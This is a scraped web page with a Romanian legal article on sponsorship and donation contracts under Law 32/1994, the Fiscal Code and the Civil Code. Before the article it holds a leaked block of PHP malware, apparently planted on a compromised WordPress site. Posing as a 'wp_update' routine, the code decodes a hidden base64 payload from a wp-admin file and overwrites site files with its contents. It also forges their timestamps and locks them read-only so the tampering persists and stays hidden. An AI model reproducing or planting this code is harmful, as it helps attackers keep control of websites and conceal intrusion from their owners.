$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } InfoCons: Contractul de sponsorizare si contractul de donatie – O noua atitudine

Acest tip de contract beneficiaza de o reglementare legala, in sensul ca Legea nr. 32 / 1994 este aceea ce cuprinde dispozitii legale privind contractul de sponsorizare.

Astfel, in cazul in care sponsorizarea consta in bunuri materiale, acestea trebuie sa fie evaluate prin contractul de sponsorizare la valoarea lor reala din momentul predarii lor catre beneficiar.

Articolul 2 al acestei legi, stabileste ca poate fi considerata sponsor, “orice persoana fizica sau juridica din Romania sau din strainatate care efectueaza o sponsorizare in conditiile legii.”

De asemenea, este specificat ca persoanele fizice sau juridice din Romania nu pot efectua activitati de sponsorizare din surse obţinute de la buget.

In ceea ce priveste calitatea de beneficiar al sponorizarii, legea cuprinde dispozitii mai amanuntite, astfel: ”poate beneficia de sponsorizare orice persoana juridica de utilitate publica, cu sediul în Romania, care desfasoara sau urmeaza sa desfasoare o activitate cu caracter direct umanitar, filantropic, cultural, artistic, educativ, stiintific, religios, sportiv sau care este destinata protecţiei drepturilor omului si educatiei civice ori calitatii mediului înconjurator.

    Sponsorul ori beneficiarul poate sa aduca la cunostinta publicului sponsorizarea numai prin promovarea numelui sau a marcii ori a imaginii sale fiind interzis (conform art. 6, al aceleiasi legi) ca prin opreratiunea de sponsorizare beneficiarul ori sponsorul sa efectueze reclama comerciala anterioara, concomitenta sau ulterioara activiatii sponsorizate, in favoarea sponsorului sau a altor persoane decat beneficiarul.

Ca efect al sponsorizarii, sponsorul beneficiaza de anumite facilitati, in sensul reducerii venitului impozabil.

Un contract de sponsorizare pentru a fi recunoscut de catre autoritatile fiscale, trebuie sa fie incheiat in conformitate cu prevederile Legii 32/1994 cu modificarile si completarile ulterioare.

De asemenea, potrivit prevederilor art.21 alin (4) lit. p. din Codul Fiscal, cheltuielile de sponsorizare efectuate potrivit legii sunt cheltuieli nedeductibile fiscal, dar pot fi scazute din impozitul pe profit datorat daca sunt indeplinite cumulativ urmatoarele conditii:

1. sunt in limita a 3 la mie din cifra de afaceri;

2. nu depasesc mai mult de 20% din impozitul pe profit datorat.

Daca in cazul contractului de sponsorizare, conditiile care trebuie indeplinite de sponor nu sunt atat de exigente, in cazul contractului de donatie, conditiile pentru ca un asemenea tip de contract sa fie valabil sunt imperative si stabilite expres de lege.

Noul Cod Civil da o definitie contractului de donatie in art. 985 ”donatia este contractul prin care, cu intentia de a gratifica, o parte, numita donator, dispune irevocabil de un bun in favoarea celeilalte parti, denumita donator.”

In principiu, donatia creeaza obligatii doar in sarcina donatorului, motiv pentru care are caracteristicile unui contract unilateral.

Astfel, premiile, cadourile prin diferite recompense facute cu scopuri publicitare nu constituie donatii. De asemenea, operele de binefacere au reguli special care exceed cadrul legal al donatiilor.

Noul Cod Civil consacra ca si conditie a valabilitatii contractului de donatie, incheierea acestuia in forma autentica, sub sanctiunea nulitatii absolute.

Forma autentica a contractului este o masura de protectie a vointei donatorului, care dispune in mod actual si irevocabil de un drept in favoarea altei personane.

Donatia se poate incheia intre persoane prezente dar si intre persoane absente.

Un regim juridic special  il au donatiile pe care le pot primi partidele politice, ca si persoane juridice de drept public. Astfel acestea nu pot dapasi intr-un an fiscal 0.025 % din veniturile prevazute in bugetul de stat pe anul respectiv.

Este interzisa acceptarea donatiilor din partea unui sindicat sau a unui cult religios, indiferent de natura acestora.

In ceea ce priveste donatiile facute persoanelor de drept privat, cu scop patrimonial, ori nepatrimonial, acestea se accepta de catre organele statutare, in raport cu competentele repartizate, fara nici o restrictive, in afara celei legate de concordanta donatiilor pirmite cu scopul si cu obiectul statutar.

         

 

By o9admin